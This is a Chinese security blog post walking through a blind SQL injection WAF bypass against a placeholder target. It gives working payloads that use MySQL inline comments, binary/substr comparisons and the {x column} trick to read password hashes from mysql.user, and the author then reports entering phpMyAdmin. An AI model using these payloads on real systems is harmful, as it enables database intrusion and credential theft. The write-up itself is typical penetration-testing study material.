
<!DOCTYPE html>
<html lang="zh-CN" class="loading">
<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>一次sql注入bypass的思考 - Sriracha :)</title>
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate">
    <meta name="keywords" content="TriDiamond Obsidian,"> 
    <meta name="description" content="
目标站点:http://www.attack.com
注入点：http://www.attack.com?check.php


请求包：POST http://www.attack.com?ch,"> 
    <meta name="author" content="sher10ck"> 
    <link rel="alternative" href="atom.xml" title="Sriracha :)" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    <link href="https://fonts.loli.net/css?family=Roboto+Mono|Rubik&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="//at.alicdn.com/t/font_1429596_nzgqgvnmkjb.css">
    <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.7.2/animate.min.css">
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css">
    <link rel="stylesheet" href="//cdn.bootcss.com/codemirror/5.48.4/codemirror.min.css">
    <link rel="stylesheet" href="//cdn.bootcss.com/codemirror/5.48.4/theme/dracula.css">
    <link rel="stylesheet" href="/css/obsidian.css">
    <link rel="stylesheet" href="/css/ball-atom.min.css">
</head>
</html>

<body class="loading">
    <div class="loader">
        <div class="la-ball-atom la-2x">
            <div></div>
            <div></div>
            <div></div>
            <div></div>
        </div>
    </div>
    <span id="config-title" style="display:none">Sriracha :)</span>
    <div id="loader"></div>
    <div id="single">
    <div class="scrollbar gradient-bg-rev"></div>
<div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <div class="navigation animated fadeIn fast delay-1s">
        <img id="home-icon" class="icon-home" src="/img/favicon.png" alt="" data-url="http://sherlocz.github.io">
        <div id="play-icon" title="Play/Pause" class="iconfont icon-play"></div>
        <h3 class="subtitle">一次sql注入bypass的思考</h3>
        <div class="social">
            <!--        <div class="like-icon">-->
            <!--            <a href="javascript:;" class="likeThis active"><span class="icon-like"></span><span class="count">76</span></a>-->
            <!--        </div>-->
            <div>
                <div class="share">
                    
                        <a href="javascript:;" class="iconfont icon-share1"></a>
                        <div class="share-component-cc" data-disabled="facebook,douban,linkedin,diandian,tencent,google"></div>
                    
                </div>
            </div>
        </div>
    </div>
</div>

    <div class="section">
        <div class=article-header-wrapper>
    <div class="article-header">
        <div class="article-cover animated fadeIn" style="
            animation-delay: 600ms;
            animation-duration: 1.2s;
            background-image: 
                radial-gradient(ellipse closest-side, rgba(0, 0, 0, 0.65), #100e17),
                url(/img/cover.jpg) ">
        </div>
        <div class="else">
            <p class="animated fadeInDown">
                
                <a href="javascript:;"><b>「 </b>文章<b> 」</b></a>
                
                七月 01, 2019
            </p>
            <h3 class="post-title animated fadeInDown"><a href="/2019/07/01/一次sql注入bypass的思考/" title="一次sql注入bypass的思考">一次sql注入bypass的思考</a>
            </h3>
            
            <p class="post-count animated fadeInDown">
                
                <span>
                    <b class="iconfont icon-text2"></b> <i>文章字数</i>
                    9.8k
                </span>
                
                
                <span>
                    <b class="iconfont icon-timer__s"></b> <i>阅读约需</i>
                    9 mins.
                </span>
                
                
                
                <span id="busuanzi_container_page_pv">
                    <b class="iconfont icon-read"></b> <i>阅读次数</i>
                    <span id="busuanzi_value_page_pv">0</span>
                </span>
                
            </p>
            
            
            <ul class="animated fadeInDown post-tags-list"><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/bypass/">bypass</a></li><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/注入/">注入</a></li></ul>
            
        </div>
    </div>
</div>

<div class="screen-gradient-after">
    <div class="screen-gradient-content">
        <div class="screen-gradient-content-inside">
            <div class="bold-underline-links screen-gradient-sponsor">
                <p>
                    <span class="animated fadeIn delay-1s"></span>
                </p>
            </div>
        </div>
    </div>
</div>

<div class="article">
    <div class='main'>
        <div class="content markdown animated fadeIn">
            <ul>
<li>目标站点:<a href="http://www.attack.com" target="_blank" rel="noopener">http://www.attack.com</a></li>
<li>注入点：<a href="http://www.attack.com?check.php" target="_blank" rel="noopener">http://www.attack.com?check.php</a><a id="more"></a>
</li>
</ul>
<p>请求包：<br>POST <a href="http://www.attack.com?check.php" target="_blank" rel="noopener">http://www.attack.com?check.php</a> HTTP/1.1<br>Host: <a href="http://www.attack.com" target="_blank" rel="noopener">www.attack.com</a><br>Connection: keep-alive<br>Content-Length: 34<br>Accept: <em>/</em><br>Origin: <a href="http://www.attack.com" target="_blank" rel="noopener">http://www.attack.com</a><br>X-Requested-With: XMLHttpRequest<br>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36<br>Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br>Referer: <a href="http://www.attack.com" target="_blank" rel="noopener">http://www.attack.com</a><br>Accept-Encoding: gzip, deflate<br>Accept-Language: zh,en-US;q=0.9,en;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6<br>type=2&amp;date=2019-06-20&amp;pihao=1</p>
<h1 id="判断注入"><a href="#判断注入" class="headerlink" title="判断注入"></a>判断注入</h1><p>首先判断出了date参数这里可以闭合：</p>
<p>date=2019-06-20<br><img src="/2019/07/01/一次sql注入bypass的思考/init.png" alt="一次sql注入bypass的思考/init.png"></p>
<p>date=2019-06-20’<br><img src="/2019/07/01/一次sql注入bypass的思考/init2.png" alt="一次sql注入bypass的思考/init.png"><br>date=2019-06-20’–+<br><img src="/2019/07/01/一次sql注入bypass的思考/init3.png" alt="一次sql注入bypass的思考/init.png"></p>
<p>然后看下哪些东西过滤了：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">and 1=1 //拦截</span><br><span class="line">and ~1=~1 //拦截</span><br><span class="line">and -1=-1 //拦截</span><br><span class="line">or 1=1 //拦截</span><br><span class="line">xor 1=1 //拦截</span><br><span class="line">and 1 between 1 and 2 //拦截</span><br><span class="line">and hex(1)=1 //拦截</span><br><span class="line">and hex(1)=s //不拦截</span><br></pre></td></tr></table></figure></p>
<p>注释符：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">/**/ //不拦截</span><br><span class="line">/*!*/ //不拦截</span><br><span class="line">/*!12345*/ //拦截</span><br><span class="line">(/*!12345*/) //不拦截</span><br></pre></td></tr></table></figure></p>
<p>猜测，比较等于号两边的值的数值类型</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">and 1=1 //拦截</span><br><span class="line">and 1=s	//不拦截</span><br></pre></td></tr></table></figure>
<p>所以我们可以判断的payload:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">and 数字=sql语句</span><br><span class="line">and 字符=sql语句</span><br></pre></td></tr></table></figure></p>
<p>打开mysql:<br><img src="/2019/07/01/一次sql注入bypass的思考/mysql.png" alt="一次sql注入bypass的思考/mysql.png"></p>
<p>那么我们最终的猜想就是等号的一边是数值，一边是字符串类型的数字。<br>用hex()这个函数来判断有个鸡肋，就是转换成的十六进制，但是十六进制只是由0、1、2、3、4、5、6、7、8、9、A、B、C、D、E、F16个字符组成，所以后续判断出其他的字符的时候比较的鸡肋，这个函数只能辅助判断是否存在注入点，但是在实战中不推荐使用。</p>
<h1 id="基本信息"><a href="#基本信息" class="headerlink" title="基本信息"></a>基本信息</h1><p>首先来判断一下user()的长度:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&apos; and 1=length(user())--+ //拦截</span><br><span class="line">&apos; and user()--+ //拦截</span><br><span class="line">&apos; and user--+ //不拦截</span><br></pre></td></tr></table></figure></p>
<p>那么就是user和()之间这个位置要有所动作了：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#Mysql中可以利用的空白字符有：%09,%0a,%0b,%0c,%0d,%20,%a0；</span><br><span class="line">user%0a()</span><br><span class="line">uSer%0a()</span><br></pre></td></tr></table></figure></p>
<p>空白字符不行，尝试下内联注释：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(/*!12345user*/())	//不拦截</span><br></pre></td></tr></table></figure></p>
<p>所以我们可以判断user()字符的长度了：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos; and 10=length(/*!12345user*/())--+</span><br></pre></td></tr></table></figure></p>
<p>bypass成功，同理我们可以推断出主机名，数据库名，版本等一些基本的信息</p>
<p>这里我们又遇到了一个问题，上面我们的思路是基于等号两边值的类型不同来注入的，但是当我们遇到字符的时候，就比较的难搞了(当然转换成ascii来判断也是行的，不过找了更好的方式)。</p>
<p>想不到思路了下了一个mysql手册(没思路的时候多看看手册，说不定有新的收获)：<br><img src="/2019/07/01/一次sql注入bypass的思考/mysql手册.png" alt="一次sql注入bypass的思考/mysql手册.png"></p>
<p>在函数和操作符当中，找到了如下的内容：<br><img src="/2019/07/01/一次sql注入bypass的思考/Binary.png" alt="一次sql注入bypass的思考/Binary.png"></p>
<p>BlahBlah了一大堆，我们直接来测试一下。<br><img src="/2019/07/01/一次sql注入bypass的思考/binary_1.png" alt="一次sql注入bypass的思考/binary_1.png"></p>
<p>原理就是将等号两端的值转换成二进制进行比较，相等返回1，不同返回0。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&apos; and binary &apos;y&apos;=&apos;y&apos;--+	//拦截(估计这里是正则匹配了 and = ,下面这条并未被拦截)</span><br><span class="line">&apos; and binary &apos;y&apos;=substr(/*!12345user*/(),1,1)--+</span><br></pre></td></tr></table></figure>
<p>这样我们就可以弄出用户名的值了。</p>
<h1 id="注入密码"><a href="#注入密码" class="headerlink" title="注入密码"></a>注入密码</h1><p>按照我们上面的思路，我们要注入出数据，那么我们构造的语句应该是这样的：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos; and binary &apos;u&apos;=substr((select password from mysql.user limit 0,1),1,1)--+</span><br></pre></td></tr></table></figure></p>
<p>但是这里被拦截了：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">select password from //不拦截</span><br><span class="line">select password from mysql.user //拦截</span><br></pre></td></tr></table></figure></p>
<p>那么就要在from后面做文章了：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">from &apos;&apos; //拦截</span><br><span class="line">from &apos;mysql&apos;.user //拦截</span><br><span class="line">from &apos;mysql.user&apos; //拦截</span><br><span class="line">from &#123;&#125; //拦截</span><br><span class="line">from &#123;mysql.user&#125; //拦截</span><br><span class="line">from (/*!12345*/) //拦截</span><br></pre></td></tr></table></figure></p>
<p>这里想了好久，感觉走到尽头了，完全没办法了。</p>
<p>倒了杯热水，EMMMMMM，突然想到了Mysql的黑魔法：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Mysql黑魔法: select&#123;x user&#125;from&#123;x mysql.user&#125;;</span><br></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select password from&#123;x mysql.user&#125; //拦截</span><br></pre></td></tr></table></figure>
<p>卒。。。。没办法了。。。。</p>
<p>想了老半天，想到之前bypass360zhuji一个版本的时候，from前面不能有空格，就是用了{x table_name}</p>
<p>然后测试下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select &#123;x password&#125; from mysql.user //不拦截</span><br></pre></td></tr></table></figure></p>
<p>倒是成功了  == 奇奇怪怪的</p>
<p>最后的payload:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos; and binary &apos;u&apos;=substr((select&#123;x password&#125;from mysql.user limit 0,1),2,1)--+</span><br></pre></td></tr></table></figure></p>
<p>这样就可以爆出mysql的密码了，然后进了phpmyadmin后台，看能否进行下一步的操作。</p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>注入万变不离其宗，多尝试，多思考，多总结，肯定能够有所收获</p>
<p>推荐阅读：<br><a href="123" title="https://mp.weixin.qq.com/s?__biz=MzA3NzE2MjgwMg==&amp;mid=2448903977&amp;idx=1&amp;sn=008229fe76b96e4a229a3a4144fcb284&amp;chksm=8b55df74bc225662a50c05b4e7a1a911e177e3e276658571c0438bba803a69fff0e1748f4812&amp;mpshare=1&amp;scene=1&amp;srcid=&amp;key=5e019133200687375d5415dbb446f415fdb5df0e7f4797b8af4b2ac45ca2743c5ab11d9bbe235637d269a42be8cfe4c27ecfdcc5c5d6b832b1b5e877fe270da3462bdd848535b318081451a634514d9b&amp;ascene=1&amp;uin=MjYzNzcxNDgzMw%3D%3D&amp;devicetype=Windows+7&amp;version=62060833&amp;lang=zh_CN&amp;pass_ticket=l7gGeWjPQVP%2B7RgrEOJ2iqGAOYomvflJ4penPhkDahwhkJkVay5nAwFLDhYM1QpW">WAF Bypass数据库特性（Mysql探索篇）</a></p>
<p><a href="https://github.com/aleenzz/MYSQL_SQL_BYPASS_WIKI" title="MYSQL_SQL_BYPASS_WIKI" target="_blank" rel="noopener">MYSQL_SQL_BYPASS_WIKI</a></p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls"
                data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
            <ul id="audio-list" style="display:none">
                
            </ul>
            
            
            
    <div id='gitalk-container' class="comment link"
        data-ae='true'
        data-ci='ec894e2b66f752e8b7fb'
        data-cs='3ccc2e92bb350688fe2c2dc2930189b62622bfb1'
        data-r='blog-comments'
        data-o='TriDiamond'
        data-a='TriDiamond'
        data-d=''
    >留言</div>


            
            
        </div>
        <div class="sidebar">
            <div class="box animated fadeInRight">
                <div class="subbox">
                    <img src="https://res.cloudinary.com/tridiamond/image/upload/v1573019751/TriDiamond_logo_ui_xeublz.jpg" height=300 width=300></img>
                    <p>sher10ck</p>
                    <span>Love Sriracha?</span>
                    <dl>
                        <dd><a href="https://github.com/TriDiamond" target="_blank"><span
                                    class=" iconfont icon-github"></span></a></dd>
                        <dd><a href="https://twitter.com/TriDiamond6" target="_blank"><span
                                    class=" iconfont icon-twitter"></span></a></dd>
                        <dd><a href="https://stackoverflow.com/users/7602324/tridiamond?tab=profile" target="_blank"><span
                                    class=" iconfont icon-stack-overflow"></span></a></dd>
                    </dl>
                </div>
                <ul>
                    <li><a href="/">87 <p>文章</p></a></li>
                    <li><a href="/categories">0 <p>分类</p></a></li>
                    <li><a href="/tags">27 <p>标签</p></a></li>
                </ul>
            </div>
            
            
            
            <div class="box sticky animated fadeInRight faster">
                <div id="toc" class="subbox">
                    <h4>目录</h4>
                    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#判断注入"><span class="toc-number">1.</span> <span class="toc-text">判断注入</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#基本信息"><span class="toc-number">2.</span> <span class="toc-text">基本信息</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#注入密码"><span class="toc-number">3.</span> <span class="toc-text">注入密码</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#总结"><span class="toc-number">4.</span> <span class="toc-text">总结</span></a></li></ol>
                </div>
            </div>
            
            
        </div>
    </div>
</div>

    </div>
</div>
    <div id="back-to-top" class="animated fadeIn faster">
        <div class="flow"></div>
        <span class="percentage animated fadeIn faster">0%</span>
        <span class="iconfont icon-top02 animated fadeIn faster"></span>
    </div>
</body>
<footer>
    <p class="copyright" id="copyright">
        &copy; 2020
        <span class="gradient-text">
            sher10ck
        </span>.
        Powered by <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a>
        Theme
        <span class="gradient-text">
            <a href="https://github.com/TriDiamond/hexo-theme-obsidian" title="Obsidian" target="_blank" rel="noopener">Obsidian</a>
        </span>
        <small><a href="https://github.com/TriDiamond/hexo-theme-obsidian/blob/master/CHANGELOG.md" title="v1.4.3" target="_blank" rel="noopener">v1.4.3</a></small>
    </p>
</footer>

<script type="text/javascript" src="https://cdn.bootcss.com/mathjax/2.7.6/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>
<script>
  MathJax.Hub.Config({
    "HTML-CSS": {
      preferredFont: "TeX",
      availableFonts: ["STIX", "TeX"],
      linebreaks: {
        automatic: true
      },
      EqnChunk: (MathJax.Hub.Browser.isMobile ? 10 : 50)
    },
    tex2jax: {
      inlineMath: [
        ["$", "$"],
        ["\\(", "\\)"]
      ],
      processEscapes: true,
      ignoreClass: "tex2jax_ignore|dno",
      skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
      noUndefined: {
        attributes: {
          mathcolor: "red",
          mathbackground: "#FFEEEE",
          mathsize: "90%"
        }
      },
      Macros: {
        href: "{}"
      }
    },
    messageStyle: "none"
  });
</script>
<script>
  function initialMathJax() {
    MathJax.Hub.Queue(function () {
      var all = MathJax.Hub.getAllJax(),
        i;
      // console.log(all);
      for (i = 0; i < all.length; i += 1) {
        console.log(all[i].SourceElement().parentNode)
        all[i].SourceElement().parentNode.className += ' has-jax';
      }
    });
  }

  function reprocessMathJax() {
    if (typeof MathJax !== 'undefined') {
      MathJax.Hub.Queue(["Typeset", MathJax.Hub]);
    }
  }
</script>



    <link rel="stylesheet" href="//cdn.bootcss.com/gitalk/1.5.0/gitalk.min.css">
    <script src="//cdn.bootcss.com/gitalk/1.5.0/gitalk.min.js"></script>

<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/obsidian.js"></script>
<script src="/js/jquery.truncate.js"></script>
<script src="/js/search.js"></script>
<script src="//cdn.bootcss.com/typed.js/2.0.10/typed.min.js"></script>
<script src="//cdn.bootcss.com/blueimp-md5/2.12.0/js/md5.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>

<script src="https://cdn.bootcss.com/codemirror/5.48.4/codemirror.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/javascript/javascript.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/css/css.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/xml/xml.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/htmlmixed/htmlmixed.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/clike/clike.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/php/php.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/shell/shell.min.js"></script>

    <script src="//cdn.bootcss.com/codemirror/5.48.4/mode/python/python.min.js"></script>



    <script src="/js/busuanzi.min.js"></script>
    <script>
        $(document).ready(function () {
            if ($('span[id^="busuanzi_"]').length) {
                initialBusuanzi();
            }
        });
    </script>


<link rel="stylesheet" href="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe.min.css">
<link rel="stylesheet" href="//cdn.bootcss.com/photoswipe/4.1.3/default-skin/default-skin.min.css">
<script src="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe.min.js"></script>
<script src="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe-ui-default.min.js"></script>

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>



    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async src="//www.googletagmanager.com/gtag/js?id=UA-149874671-1"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());

        gtag('config', 'UA-149874671-1');
    </script>





<script>
    function initialTyped () {
        var typedTextEl = $('.typed-text');
        if (typedTextEl && typedTextEl.length > 0) {
            var typed = new Typed('.typed-text', {
                strings: ["Love Sriracha?", "Wanna More :)"],
                typeSpeed: 90,
                loop: true,
                loopCount: Infinity,
                backSpeed: 20,
            });
        }
    }

    if ($('.article-header') && $('.article-header').length) {
        $(document).ready(function () {
            initialTyped();
        });
    }
</script>




</html>
